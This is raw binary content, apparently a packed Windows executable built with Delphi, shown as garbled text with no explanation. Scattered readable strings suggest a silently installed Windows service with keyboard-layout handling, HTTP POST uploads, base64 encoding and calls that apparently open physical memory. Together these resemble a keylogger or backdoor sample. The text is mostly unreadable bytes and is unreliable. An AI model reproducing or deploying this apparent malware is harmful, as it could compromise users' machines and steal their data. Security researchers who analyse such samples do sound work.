p@O'�� �w� �  �l � �j� �o� @e�e48 �U�XK��|-C3�P���>'�! R��?����!FKu�3��"D&�SV�U)�E���f����$� M��U��]�����'� �}� u4��#��{8 t+����ސ!U0�GDA�A�E��1E��cx}��]��Pu WV��P� �@� 
WVS�s��bK��)1*�$��F�N�Cm�� G���F�	S#N:��,Ж4�.  �ÐQ����| �=������)�J�5��Q� 5���������(	��� [��D  u��) V2 2 eb4��2�@�3�!��8�H����� �� ��ɜ: ���,������S0H��S h���;� ,:D�kt� ����:�b�H;�ot�� ��/( �(%���@�" A
t���P��0�J�xs��t ���������U[j� I0��������	 �|)x�	���	 �ͅ�}�y��D d �������dd�"3ۉ]�0M�o&Uh^��k�����H$un��2��AH�)��!*��������( Y�) ~ ��~'���U� �T���
t	����JK  ��CHu��" q -3= M�N����� } �'���F�� ��{�.��� KN�	����i$#T��F  � W����U\WUf�& �g& �O��|&G3�)�DT�� 7�Y f�������EOu� �����]�k���}���V �b�uY� 4;�3 8�V��� � �~u�<FX\(�u}��� tt�. n; 晴���.] 9m ~RjD����( 0�w�FPh��3B� ���KtRZ"I ��T�
8�� �����<7ڋӎ9`�/ 	u6�CP3ɺ9G�� �B6{;����T��* ̋ǃ��N!�;��C`4,<VY�8a�bg �.�C � ��t-(��U }r �PW�m h��n �.f0�B�
�)�A�������"CY�) � ��������<{�R���= �b	� ��]�E��x'S� ��}� � 0%�|"""|2u&� w�[W3^x  �SW�/���%�*S�2��Y��$C��AD$+D$ ��%0�0+�P`�؋��$@( T�@P�`�\Ћ��t$� ��(�_�0�0�����D�"$|���`X
� �e�P�� # y��f�C<q�qC�U� LP4 PPU% TP XPR |U ��jZV��	_@V� $�CXP�*E P_�$��1B �	B �������� PU� ��� ��30� 1 �X�@�h� / �-���U3���4��A��ڋ苅=�\� �X�Q� s�FET�D> P�6 L�D. 0�& 4�E |� XX
�p��E@X�����)���� �� ���Z�!�0P�!@�Ӏ�@�$ ڄ����,~ '� R%��j�<nB�lpUM�L�O�Np�peCX�h��'�PX��u$jP*p��P�CL �80P@L�@��(@0`P0 C h;Ctt�Ctf����.�D�����Cd;Cp#p# �#pY�# ��h�X�
 Ƌ�D �v�F+� = �9�o-7&8��'0�'0e�'  �x� 9��� ��" ���5��@T���h-�� FU��h �#ZB%E`��	�@P�	���|���~ �u�=h��	,PW�+/ ��� � �ln C�����u��A��)_\3���L ��~	���tP�	LP�=�F 3�I3�nޅ�u͕P�
�  W`;�tR:�- <%\ �#��8��6 S\� p�x�C\�%�9�Ġ���]S��	��s���FE��x4 2�\9�(aC�B�Q U��B���8����
Pj@��� �4 @�E��0�E�  �,��5;� �Ph �7����� ƅ�  ������ ��� �.��Phe�a��.�� /�`�E� | �E�P| 7 �$hd�Xq �/: uO%�����#�2-�][	�!�����S<� � ;B<u�09�$9 �,g6iP� �-����E��M���Y0�#@U��<� ,X4B`z� ��Z��
����D �`��)� Syste m\Curren tControlSet\@\Ke yboard L ayouts\%.8x  l  textT����ƋS8�Am  Bf�5�T3ܐ�;�gu/�=� t& ��r t3�+0e&�+" Y P��T�8�TT?T3Ƀ ��t�H\� �	��t; Qu���u �H`��I(���j�� ;sD tsf�sDf� �uZT���2������@��Aj W�D ��:�;�u.���6FhW�Yd�  Pt; PWj W�B ���Z�P�` �CHYZ�C@#l���E�1� $���EUh5Mk�R%P/Q6�@j��Pj<j4�e |���	<'�պ�j�h�� ǅo� T�I  ��)�WL04��ZK� oO@.'�9 �-� V@<'mhP$&0�� �?�+��x �&�G& $@F��{��[k �bT� �P�U�E<$  ���C���"�f���D �f�D�f�� u��� tV���g
=��Q S�M�3Ɋ]���t  @$ +�:�RD ;PD���/ �JDJL�P DPL;�� ���R@;P@@�J@JH�P@PH .��D~�z�)��p��v�@�+0	�E� �,s�s@H0�@�U�R�+B �}� |' H& p� �u$� �+�u�C�)��CD�E�!j=�g���S@t  ^@U �O �Ȋ� �t . 4 �G!@U�P#�9`)P�`; !�00�
08)p�@�h V�E �P�M�U��$8��j�P	+Du� �)E�H;@��SL;U�t~3����w t�$�(mE U� @ Q b Xn { ^ +CL�"1)B�D�B�3+�@0 �'Pp���5��C�ny+ ���R��x� tR �x0 uF0�@m:�0�xW t.0�@[:E�u� ��tPF�[0�� ����D]���.G�� I覈!؃{z a�C�\ Y�.S�{v M�`1t;X�t<3���0�;p}�@��"�v ЊM��*��+�@� � �E�Ou�@/x�)��' � e;. ��Y7 a��?�"SV��@ ��� �N�� c|�� ��� M!CG!�x[�G!H	3Au4 �u�83۽�T3�M��U�U蓅RY� g�\bȥEH�:�o:UU� ��YU��D	0�	0�F	0���{d��@ �E��?S ��ϸlD� ����lTt �p$,�Z?f��ApэP��f0���M��	*  � |`jH/ L �L� $�J �����T��0� l*�k
"��] [0+����%��~�
ޣ=0��&5@0�v�� � B�t3��AW��U<���`�5����P���	�0~~ � ]� �A�S�� ������
  �)�; t$��x` t��^�!
�z��y���n jd��2 ����$=�t�{����u�]�PS��+ ���� ���|Jg�J֢0�ǟ T LQ�H�H!b�A=B u�/� ���dq������=� uc0�<�� 	�= �TL*K; h�?X$ZÐe@t�@��v3�]@B t7�@����< ;A8tj��"P�G @��X�^ �m�$�~ D$PjjH0�rb ��|$  ��YZ�H3��0p<���3 9pI�9�9 ( i���蜀��؄�t3�� WV��% |� ��T Application[)�V��t����$��2'3ҥ�u���F�x�� �X� x�xE_� p�E �C4J$Oĵ�:P= ��+�C` )�C\B��Cx�Q�C|<�Ct:�	 �( � ƃ�U ,B �`������h�t�  �'P�b�y�t�# �!�X�@�p,��{�2`�@@�]E �0�\�$Z�!�P0�K�0.�-0�ZP	@P����4��}<�C	��H~�8 ]��r�� Y�CZ [�� ��	�K>$� ���Í������d����m<MAINICONSV��~* �ڋ�^�B �uj�!�� ;$u [�P# �D?$��!$  % �%@���� P�C���Ɔ� �f � ��	 � Ӏ�� �s��VhLze��� F,�!��%#���2�:� �hP �iBF0P����~L t�FL��@A 
�*�b�[�)� �x��H���� ��~Iy Z�F ��%�MU��c�HwcU��� �b���4��!�� Sh�{E � ����C@��n@ ��}Fa�P��	 P�hZ�� >: �H� h� �P���f !�U��� �� MH���Z*�I����j [j��y���� ��Dw0�q"�f�й  ʄ� �DH��C0�2�Tα���
Pj��Cd�� ��!	8 t+r[�ڌA" �� C � � w ��I�q0�*�%/�    \` Z  �g���E��� �鎐���xWSV���y!u3ۉX�+H
0H�;S@dK3��sd�hu0h0l�x#Px;P`;  ҉P`���0����F]���jS�`�R7 ;B0uGj�S!�] �t4�&�xD���x  u�������;�t 0A�����+�@( �3��ƈ�& ������, ������l�r1�$�T $��Ph(x�xb��Y%�x t^j�#�`�G
4$j�V7� � �v0@ �p� |+h��	3W> P�# �Fܫ P��*�$���YZHS�(��w�u��	�#jh� ��� [�S�u�,p�, �,��, h�, � ò9��T	qtZA	~Q�� �uBհJ(ՠj��`
� �ܹ� �7@f�l@��z t�x4 u~	���t@|G; ���u	9�~Y�h �� �)�V���~Z t
����4@u@���ä'|jMJ��b�4f��:Bt $��
V��̀�E�P�FP�N�
�<! �6�8 HcA 1 �)��HF{��'�H[PL@Zl@
P �	0[�]�m ���Bl�S�EL�'����0�)c�S�f? +�p� �#�jVW�U@��3�UhR���2d�"�	�����XK�G
2CC`��+`��G���Q�k  FKu�A\ �]���Ã�S��f�F�@��j�@ 
����9 �$�<|E R8� A�
~p���P�}E � ��� ���pz��BA	 �~�����7��������x� =�  O�i� = )�� -�w ������H
2 -� ��8 �; -0  ������	 �"V I%�U�-& �& 	�' ��Q1 j ���.���� �A%(��'  �t	-��t�y4�E�( ���� U�t��0�@D����A�����P5aN5�U�|4 Tr@ 4 f�0� J'�� Qn@��^B�> ,��YP�Y U��Y�U �P � x�@�U����0 t�=���	��L�QL 7��9"("Pv"PZ/"�" M01+�+ �"�M9�z�  �U�J� D|: U�>�0��L� u�^�Cy5 U���X(��FHnu��`v��C��� ��z
 V��#"!��p��0ƀ����A �8TDS����! 4���1 �0��� uy� 3�Bx��]�$�"��1*�t@�Shp�! � P���&����R �t�PR�� ���t �C)� �*A@�Y30[ �L�M��IF�/%e���@+!�4����A0�&@u�	�0�B�� E+�x����� P��E���0� Q�@���|Q� �.%��80�/�0P� �� ,"��S� �:0��p#E�W�-_]��*�&NH(`
�(07(�K��(m (0�"� � ��s�h�	�C��-�|x�� �P�� ��tk1U�f�RT̒#
��<su�0�p�0!���!0���9`us""J�C�tB���c�R���� �q���M�����6%�=x7;��  Y�*�s��1耍=�I� �� �_�U��,YV��4A�!`��.��lYaS �� vcltest3.dllRe gisterAutom�O���,�!�+h �;�v)U+O ��+{���_� �{D t]�{ [ u	�CD�xW tN	 �ZPv],; t<j@��	sD�FHP�%FD @P%5%�L �L ��h�"&^�8���j����(z�B" ��`��!�� �� � 8��)���u��4 t������ 	�@~���!
��F ġ�C�t���u�u~
�B�QD��ϐ�`|�	)"�pd��+t�� E  ^" q$ != qd +P�{;��?  ;s0tV�B�� V�
0V��� 9 �,���9|Nt hF���� �SȋԐ R��� ���-:� @ �0L�r���t#=����pY�� 
u	���M���T&v0�Τ 3N�v06 �� qjyf q[ ��չqj��4;� 0���SWV�r�� ��d$psD�! :��/�u1���zl  t%0�Rl���uW��T�
 �� Npt U���F=���} =��]�H@�P��uV�.�G;�Ou�sA��U�i����٤#1 � h5 �F�F�RPU�� I 1 ��-j�U�I,> ;�u/�@�/0���]�AU	� ��-1������� �� 5
2 ��0Q����($ �*�"���Ջ�,�"(  �<$ u.�{��#�9r�� �� , CDf�������u 3����$�$Zk �"WHQ=jk=W�P�C0u��%tf�0���M�� F�����9� �j{d B� < �ֹ	 / =� "� �0W�N/W���]Ɔ��(��Z8!���~��Y\0	 ������ �^cuA�3@�URu��P���-�@�]������@  �&�-��U�P�" R����?\�^�U]^ ^@�^J<0 �xO��|<tG��O _q �;Uu!i ;P	u�� ƞ� �&P)u �FOub�� }S����H8l���P�4Q^M��څ���P�9!6�T�΃���8�W,�f�0]�i.L	�e���� �~D� �D �%�,t��Q�o���~Dh^� c�I���V��]�'��E ��i eI]$p�� �� t��u�@��%���G��$�x[$90�UX
�ĭ) ��#���Uhq � � �Oˇv��GK�_ε� ��_ ,t��d]F �` ������0��?M�
�P��,#����#�/#�� �
$ � _�k 4y@ �ܮI!F�K )�p�� uC�EҌ �-�H�Q���"�����6�%  P�����Z��4�epO���!��]�<�  �E�j�E�P��=G�E��*��E�;E�t`�E�(z �E�O�P��#@�E� F:B�Q��M̋U�+�����  �Q�UȋE�+��� � 6Ђ8Pz	�!l�� ���kX�P�$��    3�Uh ]��1d�!SkW�A0�y ��Qhd% �@8�P��UB�����E�����o�� � &��a �E��H� �&��@럐

��]�������SV3ɉ�
̄�G+��R/�V��,�}� $t4�SЍ#��6 �B�|  �87 ����$v8 �D���c��b���� �蕐
��b�	 Y����hS2? �+0��d (� ����� �<.�:O �U� ��L$f� $�D$�,9xhX(f��F�� t��L $f�T$�"�� ���Q�*�& ��"(��x�*&�
( R ,�G
ti d  m��	��u�B�	�� ou�!0�| ��)���A�tF�8 Pn�<;��S<� 2 8k�a �Y'}f�$,P�� �'FL��S � _� ~P t7�n0�A���j@@��@0=@�NP=�"�P�6 P��h�F�C�Ã�g'�I��2�2R'�(�n0���WXz�)n 0�V�3��a; ��Ż��?���	�Dh�ph��h�j��h�h�wh@]�h ׯh���{�(��:��?��
a  �������P,�����S\u "������-�� �X�= ���N��|LF3���0�R� �Tl�!,� Ei��%� 4 0
�!���GNu��I �����T�JPߤ�V�������� �; {HtK�{H (t�		 ;s!Hu�3ɺ�CH�c{H�'�'@<' ��Y��(�%�~ BM�2M��đ˖^�����M t)�xH u�*�U��U߼��U�� �
U���$U��E�[k[�f� �G*�M��&]�"�L*M�}� td wDN�)(�Ng�����o��h�;�q��BP���{ K0蓃Ob˄� �E��-�h�郭T�d5�T\�1��K��|C3���0@� ��3�� ���FKu��Z�ء���2	A-x���P�	Q��^����` L� � �P�&��-"j0 �� f��3 e��lZ���CT,P���tv� ��Y	�� KG��'���R#�/C �̝���N�H��(���������:� ��(�& �5N��m k�E�@*7� 5=:�}�4:�t
���.E� P�;9'<ps�$�. [�쩃x	0 tl�1WќSPR��-؀{W�R���j"#@�Bh�u��P� �e�=�tuU��5dY%���UL&�tjt��~L u�FL�lˀ���
L h=<T4��!4~ h�	pE V������ ��� �� u- �� �Hrf��f��+���? L�   4]8��B�i�T$G�a'@�L$W 
����
`9������!��t	��� uR>} � ;^`u0KPܱ K�BeK �t$�FdP�В =�FX�x% t����$��Fx ��	P3Ɋ��A�����-0'H��!�> �FX�^`� P�7R�y � <��	 �U (p3ɋ)��&�� �&t��Ra � ���c,r���AT��ك���YZHA6 &�@3V {f�%(!F%hc+B۟#��0Q �����{`w�:QC`�CX ��r��'� � Q�� ����X�ȉ�,'����j�<k��E�P�(� P�Z� ������\�M�U�2F ����E��*���*W*`� ]�]�S�u���3�2�2 �� w�f�xum�F��N �у�����ҵ
�� ��U�� �}�]�+�#��o?��.� � �fu�Fw
 �;�|��+FǤ��"0���}�
 �)sXD@^� �U�U��6�^�y��#`�#E�|P���$+0� �/��/�b �E4?�u� _D��AD��}};�)t*@��! �`�H���9U�R���8�T�j�҉U�i�h�iQ�`#^�W
���	%a(�؊o,
t ,u��+΍E��s�����"U��1 ���;E�~�6�;uC�";
  u�a��| J �;�����"	E���@%�2�p��7�t�����}����m"����2�N�](*�f�@X �H!���x` D� �?aA�D� �E�l���lp�f ;B`��3 �@`��l E�E���E����E���5�-�)\�E��U�4 �s@��u��}��� ����QJ@hE��0p@0��U�ƒ  �/ p` 9(U��}��6�E�P��&!�]"�+E�� �+��E�P�'���x4��0(�����E���|	 ̍�Y!�" ;�5��u�.�3  ��$�B��.t�Eԑ�*�E��EܒhPG �	05�y@��E�}� t$�I	2� @-�M�U��3��4L�0�L)* �1u3� ����BJX�xX�% �(}�
 
 U�E����Yz �Pp_ �2Ip�Eܳ��0M���4���/�" �`�G'@f����(Ǟu!c �辀c��)E�)+E�XQ�61�
 B�Z!Pd��Z!PRh'P�'0��'�l�'Pp�`U��>�ŵ���U����@��EЅ�~ȩ��AX
�)�
�U� 3�"�	 ��Y1*��!X:թ��SS�f*��ڡD�M�>Xh-���?>�ǋ��H�F �
 VP�q� X�'���)/�"Ol�S� ���L��H�nD;�t��p��0 B�gu�	��L� ���!
�{j��� f�{B �������YZ�tGQ�$��¥vJ�L��x*��:$e	(P�(�̠( �(�hx�E ���CGh�� S�� ��# [� User3 2.dll  S etLayere dWindowA ttribute4s \ZV*�@ +�B���U á��Pq\O��[Ce)�<
3�
U��pu,�=�^�IY�=� � P������xE�L��'r:G �����]� �-Ks(�Д�ͤO
 Chp�' ��� �! H0 �����  T askbarCreated:%�B����%�@�@�@�@�@Ъ@�@�@�@�� �@����*�P,��J*���#�-�\ P��Pn � �@ @:@ L TP T H �7@ � P�E j2 ��.   TEventLogger��`��X�p��  4 ^Al���A �
�A �  �E � �A.  `  ��� TDependency��|����y  SvcMgr:P��J ' Nam.e   �  IsGrouRp���� �p� �  ������ �P� ��  T   ��� �A� ���A�pies��|c���_A� �@�t�p���x  D�
 Lh�0X�A��!�� �A Ќ  TServiceThd��D #`ypeC!QH��st32stDe"st FileSyst(em�@�DTE rrorSeverityF � ̀ esIgno re	 Norma`l	 * e
esC�0 icalN@��  �P 
TSta4rt�`� stBoot� �@stAuto Manual
� isabledQ@�p�7 �P
# $S~rP x�E ��,TContinu-@I-�	"Pd� lean@ ����DTPausA�s >� � �@  !�@� A���`@�@op?�
opp��k�@ PD |�Pn � PlA  8�A p�A f� x�ȯX(@� 4�A �� A ��A  �լ< 8 0 X 0�A ���� < �E `�E � � 0�E 8 � �+u@\D"`@t@u|@�`��`���� wS!X�JNT 	AllowV$Y  �$� 
$ �!���\! ��E �� �T ���� � �� �play�Fh" �r�	 w��p$ `0R N� 
 I nteracti,ve'A�t� 	Load4%CA�@XJ�� Password^A�G�#� `A�"��L��� �{���" &P�/ 	d|b  J�  TagID\<  �  P�    WaitHintlg �� �� Be@f�Instal\l(�$ (� AfM'�h��'� O0Uni�*p�*� Q �)`�) 
��Z� 
OnzTN�	��%� 	OnExec�	�$ �  A�I� On�"�F��"�kShut
n(��! %�G�!\" H� �i� �"o�@�Ht| U��� � 8 2�iX4���X� �K�X4@�X�( X�@0 ��E  �
E �� �4 �(� TApp@l�tion�������j���* QSV��t� ���2���� M��ڋ��E���
-�	: �F�U��J��.F(j4# ��3 �S���0
 ��Ƅ�t�D5U d������^[Y�`- j F��tP�\� Ӏ�����t���~ �����*SV��6U�So �
��+�0� �E� �{ u�C�� Pj �B:b �Cj� �� j3EPf �EPV�CP� " �`	V �&˛�E��� Y]� �-�� ؃{ t�ƋS��) �G�>���( `Q Ґ�0�N�H|:
3�� ���_�,A	� ,�(h U  ��U ���@�DXPzX`@�T l9�TP� T�L!`�bU��U� �U��U؉UĉU��E�U/جUQj�� =�P��)�U!hB% 2d�"z �@@���  �E�0@�.�؍M��]��.� �}	� uqQ�K��UūU��U �Q`Y>N Y~�
M�u�7G 
-
�^@�s��_H4	y@ �d ��6 �E�P�Uġh�F �_�K EĉE��E�@=�E��E��E�% ���R�% :% ��LZ�� U��  �e ȓLr} Z}}�S6}P�X �%��X�X�}�U�}0�% �}@} R�}����K}�hB�o �E���!���� �����o��������"�ɉM� �MЉM�UX�B(�gc�@"E���u � t�?�E�P� �������@�g`gĂP����< �}� ��
 �}�b�t ��p@����EH��R�E��ߋЃ�w U�$���E U� � � � X� � ��R@�E��50D�)0H0P �	0L������QT �}� uc1�U���H�b���
�顏�q/� �Ã}�t4���4 � H��s@�E����1���P���} F �E��E�� 2
"y�!X�衯7@0����@ Z�@ �@90 9������)��U�$�����*�� �!��P϶ Mb/��A���E�� �� ��n2��P��tӋ�4j��4$K��ǆ�@ ��Fp Ɔ�q	  ��(aA �O��Fx(�� p�
��@� \�Fh�K�v	 ��[	> X�FY�D��j ��]��5赂�@�F\�b �Fx� l���F� �Fj3 �U��5`�E`�� S� ��$�Uc :^pt� � ���03�^p) ��E�= |�p�t��t	& �����C|���V0�,`���A//`Z�/�2 m�PV�� �^� A C\ �y����� ��F�U����	���Q@=Y�F P�	 0� ��P	 0�  X PNU Q�$���$�~���G\�����N��|-F3� � ������@ ����@@�0�����x  tECNuօ�tbEK ���}��U ��.�U`:U`�@P�E +E0�� j�G��1h�Db�'  Z]��t�3����	�4�����" u�{p t2�ΛP��� �  H~���� s'3Ҋ������% ����s��>t��?��Ð�@@h~F ú�3�xX t���xY	 ' �!�	��9�����U�{l u�(KFt���FCl�(����	�Cl� �cP��8�!��H���H�q���S>��"q 0 F��3�A�:�E䀻�u�E��
� &� ��� Ѐ�w
���<� s: u�E��h����2 �  �E����o ��Cd�E�L
�E�@*5�E�P��B�������u��
J��U��$j-U�5��H��� ���� ���$��@���@u>��4 �1�6�B��C A�K��
| C3*�n��m��U���8GKu�}6X��S�ZP!�:� �����
��u"� ���������0�������F<��`�� �\"�#� ,y�� �Ej "Rh{���J@�
ּ�  �x�;��2���"�A�<:��U�!HOf��P��P�9È`!Uh�`�M���$n�.�� �#��� ��|q �J��0 �-&��q�O �9b�霉� �zip�m��W�- zY�EJ��9h�E�O�!E�z7��E��	V�% �7C% /2Z���!|1} q�����| �`V�Cy1�#s �~ ���� wi$Q���$�� B��f����*�̋Ӌ�T�@�c�<$ t��1�1���5$Zt&DPD WD0f�D�����D ,�) .) M@�0�MP�L`# L0��L�$��3L 	�X) �A0����SQS� #�  ���H����K]N���\ �fihh�2 r�� ��X�D�N�Ð��M��5Y�����'	��0P	P�� ��@3���B�P�v3�`�Q `
`��p �3��X�Z8���
C���� �U�3��rE��G+r� #�%p��0Vh��P�ϔ�r�U DQ2Y�I�n���Hʁ k�l?���@�F0�)����7�7y�ny Y� �I_J �$���]�M�D�B��a��5��O��|\G�Ӣ r��� +E���t= Z�y��M�)�Z�����' 3'MD�C��COu�!a��} ���铅��j���|��TFؔE�[��,�4�`�"� EZF��	(�T�M��M�M�x'�$���P�U�*p�4��"2���"�.���E� �}� ~�u��3����  u3�����)����C| �
 PW�U�g���E���KPV�Ct��
�E���	 x*�� �@4h� �U��nE��0 C �B0�P�㨙���� �}���s�� څD`� ��p��� �Ã�$�{<��UU9 ��o �I���� �a�� P  ��ȃ�Z�`� ��� #�P���"�V�������e$��eDue$������ !-�uPS���!� �BnUh8��t�P�% ����  �@?%  I �5�� �0�紼$!t� �3� �TCȉ ]̉]�]��]�M��y���0�h? �w(���!�AI�@jG,`#�H��\�@�(	��UY��LC�|���!��HP�/\2@�2����@�@yN��I 8�{� bR ��3Q�P ���Z*�/���� W@:W;�< p��ЉE��E��G���(E��ԕG���B��'f��� �����.���E��M�0��� =N�}� uH� d	�U��P� O�E̊AP�A �G
�
Uȡ|-" ȶ"pp" bN �2�� �Ȣ� �EY��2��� �\ ��T ���5(���B �:���"�o*��!��u{�$>�� r�E���P,{��7�C)�}�����l ��`�8W�����x�� �l]1@0�R�h�
,@�(@[Af�5 �V� �f����z�7�L�E  TService TableEnt ryArray�� SvcMgr�4 P���P� D LhA  @:@ X�A* P T H �7@ � ��A ��E � �: �H> @ �P StartThread`]�W[oQ���;fhQ f1� F0�F�FR@�^�(ɋ(�#�ro8 c(�& M& ���n~��G�6����
{%��n,�xP��@ �/@�ޤ�tpC�	X�� 
���x �����EQ����$��K��f��P���	�M�����
 ����$� �Ȣ~���v�V4s(�e( &�&���b( �@�K��ǀ�8,FL�( R-�"F3��� �4(�w	#BGNu�u�FVo�2�t1�c���������n�� ���,_PJ�_P�_0m_0+ l�@`��M���TU��D��!�E� W��9|~�XhMI�Ma�ASlŒj���<&�P�ǀ���p��ta�,�����C0� ���?��e %'uju���} @�v���r��+J+�ЄT�] INSTALL  SI
LENT�3	 UiN"PE�� ��R �����F�L;2�tq0���� �� � @ � ��� T�ػ � �;չ ;1 ��F u*袂 �'�P��@ �10��`�5 ��r��H��-;s)�h�
�HF �0<	w	%���0�	@7�<z*	M��p8�G��4(łe��[�&���������N �BN�|� u�ǺP5 �I% ��r
  �D��<_ w
���IT+ sU � �Ѓ������7hh ��8]Ѝ���u���#@��Y� �{ a�Z{ 0�a	��T�1�@9
���CN�L< �xf ��i�EA�  	���n2�+ @�[ �P%8�6(��KA�*UhܰKq� ,a ��킜���~!I1�#�e���'�Z�T�(䢱`� ������ky(L^�;^%�W��BZ�u�@�\��{���U��� �; �m�} �v2��#B��U���,s�# ��S�� OT} W	��+4�A� e7�B�D��~! �O�|�/7���J�e�V �`�h �1#� 0yx-��Shttp://�a/�1��KȷSV�
�
�*��]܋��-�dY�
gE��D!h ��f��6��6\� �Xo �M܍U[�}�	8  ���	` 	 G	���F� S �E��] � ��E�P A, �E���:Ph8 �P�k�4 ��4�跄#j/h@% �P0�V% ���Eԁg�E��r_��EЖ�PVjP* $* ���@<���c�� ��E�A'Ph	 ��7v < A<}� t1~Ƅ! X����2 �ɦ�h� 
��UX��C
��E���a�z ] ����B�	 ��v7 �'`�' Ct v��z�0����(E�02� ��ǈ ��A5؊EA��SMyApp(  Accept:  */* HTTP/1.0�POS�  Conte nt-Type:  applica tion/x-w ww-form- urlencod(ed�U�Pb�ѡ�`� �����U��%���!��%� H@ݫH�H��H jH��H  A�BCDE FGHIJKLM NOPQRSTU VWXYZabc defghijk lmnopqrs tuvwxyz0 123456789+/=D3�rʢ�p��V�@���h��`y* �1�����-/��h h�i�F\@�\�����^�K �K@�(T�(1 @�0�˨Pp�P� ��:�P��hh �ڟ���L� �@= u3��(ht �P��R�! D h�p�H ��ntdll. 8Rt lInitUni�StringL ZwOpenSerc@�m0tP@�`�R(�SV����3��$� D$T�[$jV��o�"�<$C �$��C !� �|$ t
�2 � �D$�V��0�� � �D$)Y   ��̟D$D4 PS Pj�l��� l�K� j  ��PT[;�z;�i�!^[�CURR�	_USER8S���������	�,�=� I-�� ��  ��rt	��   �� #�=��/s6��	%� *��   � APjhT�2 ��="  �u< � �L��;� 
 P�0���1C���}3��,hI��/@m� �P�" Qu' �� "@\6e v i Dc \ PLy As a l M m o r SV��*��� Ћ��u3�m��%d�! ���� ���w? ދ��nL�  �E��@�@��؋�% � ? ����Ë �TP ��H��"�� ��-ӡ��ij}�b � 23Qkc !���[Á�J���ӿ@P�]���.� W`W�\W@W0�0XЉ2P�c! ��SV��T��u3��=u��? � �$����(r ��D�q z �"$ 1���!�
����@��؍F���E�<	 ��8�6�)j�)6 ��6��6P603��@)S���� �ÿ �=X<"
�2, Y��|�9�,uP�,�@ ��o�,u�8@�8��B��=H  ��"L
 ��P�*� W`�W r��W� �-?�G	�P ��#	��; �=`� ��.%T �� r u5h���R- �jƀ `0����P�o �# �@)I� h�p�� R� �����p���`Y��4�� ?�*�B N K� # / ,�  advapi32�SF QueryService�fig2��W�(hange1� �1^�-]�?L6s�&�. ��& � z�R
h? 6� �<#̸J[; �w�� jh�h� ����k�	S���L#+��8��� �b��oL�� ���-�T�';�虌	@�s ��X0�H�`���`T����Se � ,�ЦbO-  � 4�MFdE ��,�k���' � �hhrg�L �S� ���2ۊE[�t*«hA��^Afؙ
�BԤP"�p�VQT ��ʄ��t1>A��l�B 5�NtW� �(W�D| S�v ��#~����P�
�qh<ԭ ��`Ik <�q���x�ij�P�}��`� �D�� ���jDtp	�F ��� �@W�@�@�  [`�V`��` j`��<�E� � � 4y@ @:@* L P T H� �7@ � � 	EOleError���X� �v � X�XS7ys[ �\��P
�E �H \�c2 ��@� ��� x�
(	�(partm� ��FreeFPBot� pNeutral|�gË��-��J�y� k��+Ю�� u� 	 �W��~
 �,!r�,6tд6#��� �]���t����Sd: ��IUxuS�R�E����y�  �}� u4�UH��I�@$j �U��xS<@�G U�u��(E��< 藿��$P�M�3ҭ -��Mse iBZj ��S螽���@gv�À}� t�� d�A"����'����VW�P�Uck �4����`�E�P�UR�� ��M�� � �� �G�U�S{ �G�U�H �`�� 
���m�Y���Ǆۙ tp ��C��]� �	�	3ɲ�S脑f �W: [Ð����{��( ���VQiTS�H~ �ՊƋ$��$P�Zv Z<I,PZ,��,`c,PJ,��)�� ���h��E 'j6�;�<�P�0F,"�,B��]���I�E ��0QA �H�YE�gQ�=\�)��	 � ����Yf��3ɺ3�vWa ���E�VW!�,F �}Х  _^�EЉE��
� #���a���Q�E�D��P�E�P�^A�t2�E��	D���E� ��U��n � �Z�ۭ�*� ��� � Ѱ� P�V��5�O+�G��葅�#�E���2��q���/+e.ݰ2e�d��7��M����]�U�Ua� G y Ph� V��	�yBt*&*� W� PjP�0S��t� q�@Ϸ ��h�7 [� ���f��\C �� ������ � 4�@� 4�٩�(��a; )tQ&Y�h� ��0�05h=�@� �� �x �� ��0��0���xP B�����~�  � 5��Sh�{��M�`h S� J��h, �`�< pdT� `hl P�l� @p� FoleQjCo CreateInstancI nitializ�@AddRef. erProces@s< Releas�G*�sumeC lassObje0ct/ Suspend���Q@�	4���]�E��袂9*�Jw��!Cm"p6:�11S����q`1��	PVS�	<�U�
;
��
U�� �) � �UM�1@�/%����(]bi��� , :zO	�| 0�� ��,�a�o3�6��1���	`���
�E�����E
����3�Uh� 1d�! �~��@~��D��$� ��A�n ����

�E"��� ��s�E�3� �m��D �Ѐ������ �U�$��}�
u� 
�n+��@ ��nL  Hut�,��հ�UZ�05+7��U�0
 BK 0@Ke�B(�+e;�.p�3�6�P+@v �?-�E��� g E~ u"= f�8 uh0� �:	��� r�B �PL�Es� C0>�����- @�.� �=R�������Y1�M��&  Q�P	 � @* �E�6�.D ���� #| % g �P4C;��XS��1� ����Eԉ}0�F�E� �� ��u(�B�+���� �	u�� M��@� ��m�� E����u ��u�} t��0	M� Q�MQ�M�IQu�4<	PRFc���U��. �]� K��`�=� ��t�����s���u�)c��40K�40P�es���u���^� �.`�. s�K��x#�ci�P=�>	�@���E�a� �0�#���E�t< ��4 �u#�7 �]�3��eH �@��)���	��q��ZVx�0��am.�������.�X H
H���J +���M�dE@�E 
"�f� DP�F�G;}�u�輈��$�1�$�=��u	U��Y��K�xe��gX����ߛ� y]=p$�Kl@]��u�{@v>t2 ��2 @G2 f�f��(	u]��f��	@� @�D 萇 ���UP3ɊKA��C�T�B� ��t�	�A�PV��./�� �K5lh��m�3�Uhm��2d�"=	�W�C���S�v����S�g 4C ��S�TMI�Um�w ���s"�V2��0{ u�(�}� t�u��;\% ��2	 �bt� �e�����[�QU:�#!�
Z
 (hM( �\Я]1҉��K ��tK��� u���u (<t<r '<w#�v �6RP����v�v ���$�$AR!0CIu�Z �e��C!���
�u�t� �Hu��� �uj��E��{	t u@%�e�R��
PQR�E� ZY�u�QRh�sF �u<1�D�Uб2�7����B��Si1�P �@��PP�3� CP�u���. � T
�$���E R�0N@U� � �@ X$�+�P�D$�[�U�l� O�� P�0�n� ��;�@�@'���!R# $� 4�� C"�C� ��[]Ã=�Mt�	�=td	�tL�=� t2C�X��I�} �* ����8 u�#u=0 U���#�×*�m\<PH4�F�X� uO� �@ ��Q���c@��LO 	 &��	0�=N��J�` �x~ �'���j�M�j ��Y��]Ð�-osK �:������X�h � I|���}
��� �` ���f� �2 � X��h�F �
��@�@�@��  A� �N �`��� RX�0���-���E  TVariantArray^��� @	Ol�J� @<0 TConBn�
Kind� (  8 ck RunningOrNewck �L[`P em oteckAttachTlterfacex�̃�z��mU
0s
`V}
`
`��
0��
` ���٧ U� � � � Y� �   ��m� ������E  � �]�U@:@ L� P T H �
7@ � � @T�0EventDispatchQd���`( �E�0��
 �g ^� � �!@�P۠ L@�T�E V�@� � ��� P �iA 8"�A� ��A��\ �E �A @
�A  � � �A (�A  
�A P< 8 0� `�E   �+@ � �@tv �sD 
